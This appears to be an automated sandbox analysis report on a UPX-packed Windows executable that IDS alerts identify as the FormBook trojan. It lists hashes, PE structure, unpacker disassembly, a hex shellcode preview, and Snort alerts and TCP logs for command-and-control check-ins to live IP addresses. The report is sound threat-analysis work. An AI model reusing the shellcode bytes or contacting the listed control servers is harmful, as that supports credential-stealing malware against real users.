                                  Preview:84F98E0D192B10FD05E7E43AEF7957D5930866ABD5D0DA6FF50x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c0000

                                  C:\Users\user\AppData\Local\Temp\vaccinators

                                  Download File
                                  Process:C:\Users\user\Desktop\PI No 20000814C.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):270336
                                  Entropy (8bit):7.994419475076061
                                  Encrypted:true
                                  SSDEEP:6144:g6+wCRAoON1UzGt87l3ba5neMDi2K6TxNP0D1/:uRKN+vp3boRDK6jP+
                                  MD5:5298C2458262C59836913293DBBBB041
                                  SHA1:A9F3E5F597040E3DD1C281E08453EA7733603E69
                                  SHA-256:28F19E69128F8780C9ABEE8CF7C53AB7D5698E3B53905C281C751633C2570861
                                  SHA-512:0560BC83127199631788FA96FA6B7D7C595BB488E02EA454F471DC3DA0418962B612852236763EDB916D8BB51185DCCEBB27A88865E67894B2FE86CAC06AB21C
                                  Malicious:false
                                  Reputation:low
                                  Preview:z....I0NA..]....G1...f@8...AQKMTLNUI9AG297RNC0I0NAQKMTLNU.9AG<&.\N.9...@..l.$'&iI3(UKV?n Q'^!5q)(t>;;iP/gvvdr#,T,.CL[oMTLNUI98F;..2)..)W.|1,.N..sY&.(...r#W.*..w-3..<*Q|'U.7RNC0I0N..KM.MOU.{.297RNC0I.NCP@L_LN[M9AG297RNC.\0NAAKMTlJUI9.G2)7RNA0I6NAQKMTLHUI9AG297rJC0K0NAQKMVL..I9QG2)7RNC I0^AQKMTL^UI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTL`!,A5G29._JC0Y0NA_OMT\NUI9AG297RNC0I.NA1KMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQKMTLNUI9AG297RNC0I0NAQ

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                  Entropy (8bit):7.946112183475076
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.39%
                                  • UPX compressed Win32 Executable (30571/9) 0.30%
                                  • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  File name:PI No 20000814C.exe
                                  File size:691'200 bytes
                                  MD5:fddc263879fbf539b746d116e8429a7f
                                  SHA1:d83296177c8f166a95cafbd12ac1ae327ded42c7
                                  SHA256:6803a04a376df6f873fe53b3b79bf12534b8c1b74d037a01f537e74bac994f88
                                  SHA512:99b8c182f7afdc3912e567e5f408a6255fcc2c30361f84d51f2f315629d3adaf96225e819b6a9358957ea994b69e1d878b956afe0c27a8abc3041944e0041ed8
                                  SSDEEP:12288:aYV6MorX7qzuC3QHO9FQVHPF51jgcxL/wgbggD+En6onCvJzgngsU:JBXu9HGaVHh/wgbv6okJQNU
                                  TLSH:BDE423C12A86DC6BC45813BDC83F8D606441B8B1CFD03B6E8695F15FB5AA783D43785A
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                  File Icon

                                  Icon Hash:aaf3e3e3938382a0

                                  Static PE Info

                                  General

                                  Entrypoint:0x52b090
                                  Entrypoint Section:UPX1
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x664EA1CE [Thu May 23 01:54:22 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:fc6683d30d9f25244a50fd5357825e79

                                  Entrypoint Preview

                                  Instruction
                                  pushad
                                  mov esi, 004D5000h
                                  lea edi, dword ptr [esi-000D4000h]
                                  push edi
                                  jmp 00007F46F8D189FDh
                                  nop
                                  mov al, byte ptr [esi]
                                  inc esi
                                  mov byte ptr [edi], al
                                  inc edi
                                  add ebx, ebx
                                  jne 00007F46F8D189F9h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007F46F8D189DFh
                                  mov eax, 00000001h
                                  add ebx, ebx
                                  jne 00007F46F8D189F9h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc eax, eax
                                  add ebx, ebx
                                  jnc 00007F46F8D189FDh
                                  jne 00007F46F8D18A1Ah
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007F46F8D18A11h
                                  dec eax
                                  add ebx, ebx
                                  jne 00007F46F8D189F9h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc eax, eax
                                  jmp 00007F46F8D189C6h
                                  add ebx, ebx
                                  jne 00007F46F8D189F9h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc ecx, ecx
                                  jmp 00007F46F8D18A44h
                                  xor ecx, ecx
                                  sub eax, 03h
                                  jc 00007F46F8D18A03h
                                  shl eax, 08h
                                  mov al, byte ptr [esi]
                                  inc esi
                                  xor eax, FFFFFFFFh
                                  je 00007F46F8D18A67h
                                  sar eax, 1
                                  mov ebp, eax
                                  jmp 00007F46F8D189FDh
                                  add ebx, ebx
                                  jne 00007F46F8D189F9h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007F46F8D189BEh
                                  inc ecx
                                  add ebx, ebx
                                  jne 00007F46F8D189F9h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007F46F8D189B0h
                                  add ebx, ebx
                                  jne 00007F46F8D189F9h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc ecx, ecx
                                  add ebx, ebx
                                  jnc 00007F46F8D189E1h
                                  jne 00007F46F8D189FBh
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jnc 00007F46F8D189D6h
                                  add ecx, 02h
                                  cmp ebp, FFFFFB00h
                                  adc ecx, 02h
                                  lea edx, dword ptr [edi+ebp]
                                  cmp ebp, FFFFFFFCh
                                  jbe 00007F46F8D18A00h
                                  mov al, byte ptr [edx]

                                  Rich Headers

                                  Programming Language:
                                  • [ASM] VS2013 build 21005
                                  • [ C ] VS2013 build 21005
                                  • [C++] VS2013 build 21005
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [ASM] VS2013 UPD5 build 40629
                                  • [RES] VS2013 build 21005
                                  • [LNK] VS2013 UPD5 build 40629

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x17df280x424.rsrc
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x12c0000x51f28.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x17e34c0xc.rsrc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x12b2740x48UPX1
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  UPX00x10000xd40000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  UPX10xd50000x570000x56400c6c4a1700209fe930ad6331503fddca5False0.9873443161231884data7.9354788110097765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc0x12c0000x530000x52400f380fa9147265c22222d3dbc4bb7afc6False0.9380491308890577data7.918216833417907IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                  Resources

                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_ICON0x12c5ac0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                  RT_ICON0x12c6d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                  RT_ICON0x12c8040x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                  RT_ICON0x12c9300x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                  RT_ICON0x12cc1c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                  RT_ICON0x12cd480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                  RT_ICON0x12dbf40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                  RT_ICON0x12e4a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                  RT_ICON0x12ea0c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                  RT_ICON0x130fb80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                  RT_ICON0x1320640x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                  RT_MENU0xce4a00x50emptyEnglishGreat Britain0
                                  RT_STRING0xce4f00x594emptyEnglishGreat Britain0
                                  RT_STRING0xcea840x68aemptyEnglishGreat Britain0
                                  RT_STRING0xcf1100x490emptyEnglishGreat Britain0
                                  RT_STRING0xcf5a00x5fcemptyEnglishGreat Britain0
                                  RT_STRING0xcfb9c0x65cemptyEnglishGreat Britain0
                                  RT_STRING0xd01f80x466emptyEnglishGreat Britain0
                                  RT_STRING0xd06600x158emptyEnglishGreat Britain0
                                  RT_RCDATA0x1324d00x4b490data1.0003275307424895
                                  RT_GROUP_ICON0x17d9640x76dataEnglishGreat Britain0.6610169491525424
                                  RT_GROUP_ICON0x17d9e00x14dataEnglishGreat Britain1.25
                                  RT_GROUP_ICON0x17d9f80x14dataEnglishGreat Britain1.15
                                  RT_GROUP_ICON0x17da100x14dataEnglishGreat Britain1.25
                                  RT_VERSION0x17da280x10cdataEnglishGreat Britain0.6007462686567164
                                  RT_MANIFEST0x17db380x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                  Imports

                                  DLLImport
                                  KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                  ADVAPI32.dllGetAce
                                  COMCTL32.dllImageList_Remove
                                  COMDLG32.dllGetOpenFileNameW
                                  GDI32.dllLineTo
                                  IPHLPAPI.DLLIcmpSendEcho
                                  MPR.dllWNetUseConnectionW
                                  ole32.dllCoGetObject
                                  OLEAUT32.dllVariantInit
                                  PSAPI.DLLGetProcessMemoryInfo
                                  SHELL32.dllDragFinish
                                  USER32.dllGetDC
                                  USERENV.dllLoadUserProfileW
                                  UxTheme.dllIsThemeActive
                                  VERSION.dllVerQueryValueW
                                  WININET.dllFtpOpenFileW
                                  WINMM.dlltimeGetTime
                                  WSOCK32.dllconnect

                                  Possible Origin

                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishGreat Britain

                                  Network Behavior

                                  Snort IDS Alerts

                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  05/23/24-15:22:06.071714TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975880192.168.2.692.118.24.161
                                  05/23/24-15:18:49.680830TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24970580192.168.2.669.57.162.24
                                  05/23/24-15:21:58.470715TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975580192.168.2.692.118.24.161
                                  05/23/24-15:20:45.419534TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973680192.168.2.6185.253.212.22
                                  05/23/24-15:19:49.011176TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972080192.168.2.6104.21.28.203
                                  05/23/24-15:19:05.833612TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34970680192.168.2.6162.240.81.18
                                  05/23/24-15:20:14.696083TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972780192.168.2.63.33.130.190
                                  05/23/24-15:19:13.744543TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24970980192.168.2.6162.240.81.18
                                  05/23/24-15:19:19.632073TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971180192.168.2.6216.40.34.41
                                  05/23/24-15:22:26.119155TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976380192.168.2.63.33.130.190
                                  05/23/24-15:19:27.226609TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971480192.168.2.6216.40.34.41
                                  05/23/24-15:22:20.382287TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976280192.168.2.6212.227.172.253
                                  05/23/24-15:22:34.789548TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976680192.168.2.63.33.130.190
                                  05/23/24-15:22:48.963738TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976880192.168.2.6162.240.81.18
                                  05/23/24-15:22:29.725643TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976480192.168.2.63.33.130.190
                                  05/23/24-15:21:32.767630TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974880192.168.2.6194.58.112.174
                                  05/23/24-15:20:02.477355TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972480192.168.2.6203.161.43.228
                                  05/23/24-15:19:40.382894TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971880192.168.2.63.33.130.190
                                  05/23/24-15:22:43.353051TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976780192.168.2.669.57.162.24
                                  05/23/24-15:19:08.371111TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34970780192.168.2.6162.240.81.18
                                  05/23/24-15:21:47.492356TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975280192.168.2.65.101.153.149
                                  05/23/24-15:22:01.008997TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975680192.168.2.692.118.24.161
                                  05/23/24-15:21:15.750020TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974380192.168.2.6188.114.96.3
                                  05/23/24-15:21:30.227166TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974780192.168.2.6194.58.112.174
                                  05/23/24-15:21:43.953802TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975180192.168.2.65.101.153.149
                                  05/23/24-15:19:22.165946TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971280192.168.2.6216.40.34.41
                                  05/23/24-15:20:23.881931TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973080192.168.2.63.33.130.190
                                  05/23/24-15:20:50.479813TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973880192.168.2.6185.253.212.22
                                  05/23/24-15:20:17.233600TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972880192.168.2.63.33.130.190
                                  05/23/24-15:22:14.369346TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976080192.168.2.6212.227.172.253
                                  05/23/24-15:21:09.103352TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974280192.168.2.687.236.16.214
                                  05/23/24-15:19:46.313193TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971980192.168.2.6104.21.28.203
                                  05/23/24-15:20:08.950461TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972680192.168.2.6203.161.43.228
                                  05/23/24-15:20:37.057490TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973480192.168.2.63.33.130.190
                                  05/23/24-15:21:01.493554TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973980192.168.2.687.236.16.214
                                  05/23/24-15:21:18.289377TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974480192.168.2.6188.114.96.3
                                  05/23/24-15:19:35.307782TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971680192.168.2.63.33.130.190
                                  05/23/24-15:19:54.075610TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972280192.168.2.6104.21.28.203
                                  05/23/24-15:20:29.405295TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973180192.168.2.63.33.130.190
                                  05/23/24-15:21:04.025678TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974080192.168.2.687.236.16.214
                                  05/23/24-15:20:42.874552TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973580192.168.2.6185.253.212.22
                                  05/23/24-15:20:31.945274TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973280192.168.2.63.33.130.190
                                  05/23/24-15:19:32.772777TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971580192.168.2.63.33.130.190
                                  05/23/24-15:22:11.829591TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975980192.168.2.6212.227.172.253
                                  05/23/24-15:19:59.949567TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972380192.168.2.6203.161.43.228
                                  05/23/24-15:21:23.355712TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974680192.168.2.6188.114.96.3
                                  05/23/24-15:21:37.915666TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975080192.168.2.6194.58.112.174
                                  05/23/24-15:22:51.493681TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976980192.168.2.6162.240.81.18
                                  05/23/24-15:21:52.561396TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975480192.168.2.65.101.153.149

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  May 23, 2024 15:18:49.673758984 CEST4970580192.168.2.669.57.162.24
                                  May 23, 2024 15:18:49.678783894 CEST804970569.57.162.24192.168.2.6
                                  May 23, 2024 15:18:49.678978920 CEST4970580192.168.2.669.57.162.24
                                  May 23, 2024 15:18:49.680830002 CEST4970580192.168.2.669.57.162.24
                                  May 23, 2024 15:18:49.710051060 CEST804970569.57.162.24192.168.2.6
                                  May 23, 2024 15:18:50.298168898 CEST804970569.57.162.24192.168.2.6
                                  May 23, 2024 15:18:50.303018093 CEST804970569.57.162.24192.168.2.6
                                  May 23, 2024 15:18:50.303030014 CEST804970569.57.162.24192.168.2.6
                                  May 23, 2024 15:18:50.303188086 CEST4970580192.168.2.669.57.162.24
                                  May 23, 2024 15:18:50.307424068 CEST4970580192.168.2.669.57.162.24
                                  May 23, 2024 15:18:50.313431978 CEST804970569.57.162.24192.168.2.6
                                  May 23, 2024 15:19:05.826333046 CEST4970680192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:05.831440926 CEST8049706162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:05.831510067 CEST4970680192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:05.833611965 CEST4970680192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:05.885390997 CEST8049706162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:06.404011011 CEST8049706162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:06.405716896 CEST8049706162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:06.405915976 CEST4970680192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:06.410917997 CEST8049706162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:06.410933971 CEST8049706162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:06.410947084 CEST8049706162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:06.410990000 CEST4970680192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:06.410990000 CEST4970680192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:06.467498064 CEST8049706162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:06.467674971 CEST4970680192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:07.341993093 CEST4970680192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:08.363234997 CEST4970780192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:08.368874073 CEST8049707162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:08.368967056 CEST4970780192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:08.371110916 CEST4970780192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:08.424000978 CEST8049707162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:08.944555044 CEST8049707162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:08.945955038 CEST8049707162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:08.946085930 CEST4970780192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:08.949326038 CEST8049707162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:08.949333906 CEST8049707162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:08.949347973 CEST8049707162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:08.949420929 CEST4970780192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:08.995491982 CEST8049707162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:08.997145891 CEST4970780192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:09.872883081 CEST4970780192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:10.892182112 CEST4970880192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:10.897629976 CEST8049708162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:10.898530006 CEST4970880192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:10.900278091 CEST4970880192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:10.907443047 CEST8049708162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:10.959381104 CEST8049708162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:11.487282991 CEST8049708162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:11.488650084 CEST8049708162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:11.488723993 CEST4970880192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:11.492068052 CEST8049708162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:11.492082119 CEST8049708162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:11.492089987 CEST8049708162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:11.492197037 CEST4970880192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:11.492197037 CEST4970880192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:11.543442011 CEST8049708162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:11.545466900 CEST4970880192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:12.721344948 CEST4970880192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:13.736871958 CEST4970980192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:13.742003918 CEST8049709162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:13.742691040 CEST4970980192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:13.744543076 CEST4970980192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:13.794564009 CEST8049709162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:14.310803890 CEST8049709162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:14.311640024 CEST8049709162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:14.311840057 CEST4970980192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:14.318681002 CEST8049709162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:14.318696976 CEST8049709162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:14.318707943 CEST8049709162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:14.318840981 CEST4970980192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:14.318866968 CEST4970980192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:14.320998907 CEST4970980192.168.2.6162.240.81.18
                                  May 23, 2024 15:19:14.341939926 CEST8049709162.240.81.18192.168.2.6
                                  May 23, 2024 15:19:19.619318008 CEST4971180192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:19.629822969 CEST8049711216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:19.630108118 CEST4971180192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:19.632072926 CEST4971180192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:19.704380035 CEST8049711216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:20.166640043 CEST8049711216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:20.167527914 CEST8049711216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:20.167630911 CEST4971180192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:20.172131062 CEST8049711216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:20.176995039 CEST8049711216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:20.177005053 CEST8049711216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:20.177086115 CEST4971180192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:20.187411070 CEST8049711216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:20.187546968 CEST4971180192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:20.190502882 CEST8049711216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:20.190517902 CEST8049711216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:20.190593958 CEST4971180192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:20.198250055 CEST8049711216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:20.198261023 CEST8049711216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:20.198292971 CEST8049711216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:20.198383093 CEST4971180192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:20.203084946 CEST8049711216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:20.203155994 CEST4971180192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:20.205920935 CEST8049711216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:20.247869015 CEST4971180192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:20.261265993 CEST8049711216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:20.262737036 CEST8049711216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:20.262918949 CEST4971180192.168.2.6216.40.34.41
